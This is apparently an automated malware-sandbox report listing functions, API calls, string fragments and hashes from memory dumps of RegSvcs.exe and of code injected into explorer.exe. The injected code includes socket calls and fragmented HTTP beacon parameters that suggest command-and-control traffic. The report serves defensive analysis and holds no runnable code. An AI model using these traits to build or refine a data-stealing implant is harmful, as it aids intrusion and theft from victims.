Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2363049c5de6d37bce482d026983d18381bf0733c0c6fbd2cddc4e398223c2
Instruction ID: 83de49f060b26b39014dc7f524e52e68cf0c35004df77e9fa188261320a88f40
Opcode Fuzzy Hash: ba2363049c5de6d37bce482d026983d18381bf0733c0c6fbd2cddc4e398223c2
Instruction Fuzzy Hash: 0990023520150402D5117198980C64640CA97D0301F55D411A0464558DC65489A1A221

Uniqueness

Uniqueness Score: -1.00%

Function 019D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: ffa9e6633d07f3c4dfcf5ff0ebfde08d395535434d4d32879e5fd1fc73323d62
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 019D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019D293C
___swprintf_l.LIBCMT ref: 019D295E
___swprintf_l.LIBCMT ref: 019D29A3
___swprintf_l.LIBCMT ref: 01A0A52E

Strings

:%u.%u.%u.%u, xrefs: 01A0A5B8
::%hs%u.%u.%u.%u, xrefs: 01A0A527
::ffff:0:%u.%u.%u.%u, xrefs: 01A0A54E
ffff:, xrefs: 01A0A504

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d4c6fce626e88f1d7bab6207c418fe96009f8188c8acab1565986391c443acd4
Instruction ID: af3555c6a1f546f44dc01273c2007d711d479dd43697889456ab61170e59e97c
Opcode Fuzzy Hash: d4c6fce626e88f1d7bab6207c418fe96009f8188c8acab1565986391c443acd4
Instruction Fuzzy Hash: BF51E7B6A04216BFDB22DFACC99097EFBB8BB48241714C129F45DD7641D374EE4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 01A42410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A424A6
___swprintf_l.LIBCMT ref: 01A424E2
___swprintf_l.LIBCMT ref: 01A4257D
___swprintf_l.LIBCMT ref: 01A425A3
___swprintf_l.LIBCMT ref: 01A425C8
___swprintf_l.LIBCMT ref: 01A42608

Strings

:%u.%u.%u.%u, xrefs: 01A425FF
ffff:, xrefs: 01A4247D, 01A4249D
::%hs%u.%u.%u.%u, xrefs: 01A4249E
::ffff:0:%u.%u.%u.%u, xrefs: 01A424DA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 70a017e46c8285fd11ab07ba9bfc40f85adcc49e6c4110c568d9220e96c337f2
Instruction ID: d26d00fc65f312a58c2a2fcfd5e2c4b2713a813eb797a6d64b7fcf047096b454
Opcode Fuzzy Hash: 70a017e46c8285fd11ab07ba9bfc40f85adcc49e6c4110c568d9220e96c337f2
Instruction Fuzzy Hash: A551F875A006456FDB31DFADD890A7FF7F8EF84200B04845AF49AC7642D6B4DA40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 019C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A04655
ExecuteOptions, xrefs: 01A046A0
Execute=1, xrefs: 01A04713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01A04787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A04725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A04742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A046FC

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6545d0240c294ed02141779b5e6d38a12acf596a017b840e1791b79510c21870
Instruction ID: 5b09dd88ba92c55993d3849c6507236467a13c6c652e9b68ee0302f7ac0d33f5
Opcode Fuzzy Hash: 6545d0240c294ed02141779b5e6d38a12acf596a017b840e1791b79510c21870
Instruction Fuzzy Hash: D5513931A002196BEF15ABE9ED85FEE77A8FF58B00F0400ADD60DA7180E7719A458F52

Uniqueness

Uniqueness Score: -1.00%

Function 01A66940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 1ae3d9e203271c4c04b2a3d30769814f0d723275b131aa1c9510cd05b63fbbf7
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 8E020671508342AFD305CF28C990A6FBBE9EFD8704F048A2DF9898B254DB35E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019DB6BF

Strings

+, xrefs: 019DB65A
0, xrefs: 019DB695
0, xrefs: 019DB66F
-, xrefs: 019DB650

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: d261b85fe34f9022c817b5124cc6872c05a02756511be8e9fc47a265e0bd0620
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 9381E230E052498FEF25CE6CC851BFEBBB5AF46361F5AC519D85BA7681C7348840CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A4214F
___swprintf_l.LIBCMT ref: 01A42172

Strings

[, xrefs: 01A4212B
%%%u, xrefs: 01A42146
]:%u, xrefs: 01A42169

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: e7428f49d611583019135c4421feedf8945091f9761d224f0dcd15d03cb8f460
Instruction ID: 95d6c260ae8e91c87583a4ba3e7a43ad9a30963e91c7757fbc8d9215ba3809b0
Opcode Fuzzy Hash: e7428f49d611583019135c4421feedf8945091f9761d224f0dcd15d03cb8f460
Instruction Fuzzy Hash: 6D21337AE00219ABDB11DF7DD844AEEBBF8EF94654F440116F905E3201E770DA01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A0031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A002BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A002E7

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: f3bd0baca42b27e8620ea6bd6a87975dcf99d725dfb61fc68915a7080f4cb598
Instruction ID: c225aafdb387e1135ad71c95982056c52aa661a8b012d56b916d68d31ae7ea8c
Opcode Fuzzy Hash: f3bd0baca42b27e8620ea6bd6a87975dcf99d725dfb61fc68915a7080f4cb598
Instruction Fuzzy Hash: D9E1CD30604742DFD726CF28CA84B6ABBE0BF88354F144A6DF5A98B2E1D774D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 019CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01A07B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A07B7F
RTL: Re-Waiting, xrefs: 01A07BAC

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 4d4ebf276f8b98c692c71da47cc56d1d395ab28645e5d43dfdfc3cdeee6c684d
Instruction ID: 9d9eb0153b1d2285e7bb7773a26a327570be3c5a2d1df7b203b60ee5cdb32cf6
Opcode Fuzzy Hash: 4d4ebf276f8b98c692c71da47cc56d1d395ab28645e5d43dfdfc3cdeee6c684d
Instruction Fuzzy Hash: 9E41D1317007039FD721DE29D841B6AB7E5EF99B51F000A1DE99E97780DB31F8058B92

Uniqueness

Uniqueness Score: -1.00%

Function 019CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A0728C

Strings

RTL: Resource at %p, xrefs: 01A072A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A07294
RTL: Re-Waiting, xrefs: 01A072C1

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 3392c366a589d643bd25088dc172f81566a9b5dafe85e33af5d16ce02daafa51
Instruction ID: 630919896d1803a38333ed69b1471d7db57e76f8e92157f4a05ba5ea61754acf
Opcode Fuzzy Hash: 3392c366a589d643bd25088dc172f81566a9b5dafe85e33af5d16ce02daafa51
Instruction Fuzzy Hash: 0A412331704256ABC721CF69DC41F66B7A5FF98B50F10061CF99A9B280DB30F81287D1

Uniqueness

Uniqueness Score: -1.00%

Function 01A42300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A4238D
___swprintf_l.LIBCMT ref: 01A423B3

Strings

]:%u, xrefs: 01A423AA
%%%u, xrefs: 01A42384

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b73ef101e3dc23476cdc387b82f6be6aad34e459050df6bb7241a94730638c47
Instruction ID: 224a89795378eb839d39c65539b75e513b7c499a1a1aa6f3128f633aa5d79da5
Opcode Fuzzy Hash: b73ef101e3dc23476cdc387b82f6be6aad34e459050df6bb7241a94730638c47
Instruction Fuzzy Hash: 62318172A006199FDB60DF2DDC44BEEB7F8EB84610F44455AF949E3200EB30EA448FA0

Uniqueness

Uniqueness Score: -1.00%

Function 019D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019D7E8B

Strings

-, xrefs: 019D7DDD
+, xrefs: 019D7DE8

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 50898ed7445bb9525647223fc68f646965692700621e7ac26a4bc78180d0cb2d
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 7491C771E002169BDF38CFADC881ABEBBA9EF44329F14C55AE95DE72D0D73099408761

Uniqueness

Uniqueness Score: -1.00%

Function 01999126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01999175
$, xrefs: 01999191

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: bd3f2fc21dc1bfcfea8d3798e4fad81b0bd1ff0ab5568058a261b5967cb9cc0a
Instruction ID: 73264c035d623cc29d1b8d94ab2aac993df8b8af419aed50ecab172297625822
Opcode Fuzzy Hash: bd3f2fc21dc1bfcfea8d3798e4fad81b0bd1ff0ab5568058a261b5967cb9cc0a
Instruction Fuzzy Hash: C3810C75D002699BDB35DB54CC44BEEB7B8BB48714F0041DAAA1DB7240D7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2580, Parent PID: 7708COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 0F985F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0F98612E
setsockopt.WS2_32 ref: 0F986830
recv.WS2_32 ref: 0F986859

Strings

&sql, xrefs: 0F986471
dat=, xrefs: 0F986290
&br=, xrefs: 0F986509
Co, xrefs: 0F986323
&un=, xrefs: 0F9864F1
tion, xrefs: 0F986331
GET , xrefs: 0F986318
ose, xrefs: 0F98633F
: cl, xrefs: 0F986338
nnec, xrefs: 0F98632A

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 213ccd6fbfc68cae89f1736d8bcb020640eae359de5aa9c4cfa7fa6b8fe87000
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: A8524D31614B088BCB69EF68C4947E9B7E1FB94300F50466ED49FCB187DE34A94ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F985232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0F985449

Strings

`, xrefs: 0F98541D

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: a4156513227af3a224fc9ba0f7c1ec2bf6a08adccaee71d2e5a803b5d4c82dc6
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: A0226C70A18B099FCB59EF28C4946AEF7E1FB98311F85062ED05ED7291DB30E456CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F986E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F986E67

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 556f60d2a55ce54623259eae7adbb91b6a64f02c447a3e960ee2ab027754239e
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 52019E30628B884F8B88EF6CD48412AB7E4FBC9214F000B3EA99AC7251EB64C9424742

Uniqueness

Uniqueness Score: -1.00%

Function 0F986E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F986E67

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 0ec644cb630c1e6612d772040210291e62093d91a439ace2e5e578b3862f8efb
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 0B01A234628B884B8B48EF3C94452A6B3E5FBCE314F400B3EE9DAC3241DB25D9024782

Uniqueness

Uniqueness Score: -1.00%

Function 0F9808C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F9809A0

Strings

on.d, xrefs: 0F980902
User-Agent: , xrefs: 0F980935, 0F980948
nt: , xrefs: 0F98091E
urlmon.dll, xrefs: 0F980959

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 4936e6354c91cf9095aa48f089f33552b2b1b7ee8d96bff27a040a9e4d8e8a6d
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7631C231614B4C8BCB05FFA8C8457EDB7E0FB98214F40022AD44ED7282DE7886498785

Uniqueness

Uniqueness Score: -1.00%

Function 0F9808BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F9809A0

Strings

on.d, xrefs: 0F980902
User-Agent: , xrefs: 0F980935, 0F980948
nt: , xrefs: 0F98091E
urlmon.dll, xrefs: 0F980959

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: ede953017deaca775594e57d2f47d8a7426017577e95d22552886840875e3fce
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2821C330610B4C8ACB05FFA8C8557ED7BA4FF98214F40422AD45AD7292DF78864A8B85

Uniqueness

Uniqueness Score: -1.00%

Function 0F97CB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F97CCCA

Strings

kern, xrefs: 0F97CB99
el32, xrefs: 0F97CBA0
.dll, xrefs: 0F97CBCD

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: f77d04b7c1bf8d9afa16797ce575aa1a2f6089fdc28187e5e8d939e463b21b34
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 0F416C70918B088FDB54EFA8C4947AD77E0FB98300F44457AD84ADB296EE349946CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F97CB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F97CCCA

Strings

kern, xrefs: 0F97CB99
el32, xrefs: 0F97CBA0
.dll, xrefs: 0F97CBCD

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: cbfa8b679c39b53d5a979ff69ca75ddaef520434ad98380233b987da0432231e
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 50412B70918A088FDB94EFA8C499BED77F0FB98300F44457AC84EDB256DE349946CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F98272E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F982791

Strings

ect, xrefs: 0F982761
conn, xrefs: 0F98275A

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 82457d57397cdefdff235db5af4eef76bda539fd63c626f04b0e1c2259449307
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: DA014C30618B188FCB84EF1CE088B55B7E0EB59324F1545AA990DCB266C674D8818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0F982732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F982791

Strings

ect, xrefs: 0F982761
conn, xrefs: 0F98275A

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 5146dabe7519a961bd968db49849ac92a1acf8aab86088019afc35696f801490
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 32012C70618A1C8FCB84EF5CE088B55B7E0FB59324F1541AEA90DCB266CB74DD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0F9826B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0F982713

Strings

send, xrefs: 0F9826DA

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: b1e6d8d8f39e26540736ce9087ace2aca47ca05b74009bce5d9ae87ba39b4b0e
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 61011270518A588FDB84EF1CD048B2577E0FB58314F5645AED85DCB266C670D8858B81

Uniqueness

Uniqueness Score: -1.00%

Function 0F9825B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0F982611

Strings

sock, xrefs: 0F9825D9

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: e4811a24c062d15dac00a3b194826bc098b158f7514dd91a45a566a3690940ea
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: C10171306186188FCB84EF1CD048B50BBE0FB59314F1545AED40ECB266C7B0C9818B82

Uniqueness

Uniqueness Score: -1.00%

Function 0F97A2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

